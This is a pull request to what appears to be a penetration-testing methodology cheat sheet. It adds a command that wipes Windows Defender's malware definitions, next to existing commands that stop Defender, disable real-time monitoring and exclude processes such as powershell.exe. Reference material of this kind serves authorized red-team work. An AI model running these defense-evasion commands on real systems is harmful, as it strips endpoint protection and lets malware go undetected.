### PR TITLE
Update Windows - Persistence.md

### DIFF
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -51,6 +51,10 @@ sc config WinDefend start= disabled
 sc stop WinDefend
 Set-MpPreference -DisableRealtimeMonitoring $true
 
+# Wipe currently stored definitions
+# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
+MpCmdRun.exe -RemoveDefinitions -All
+
 ## Exclude a process / location
 Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
 Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'


### PR DESCRIPTION
Add example to `disable windows defender` which uses MpCmdRun.exe to reset the current definitions. 

I recently used this and it was sufficient, that defender did not recognize previously flagged malicious files. It is quite helpful in case, that Set-MpPreference is not present or that the attacker is not allowed to adjust the service.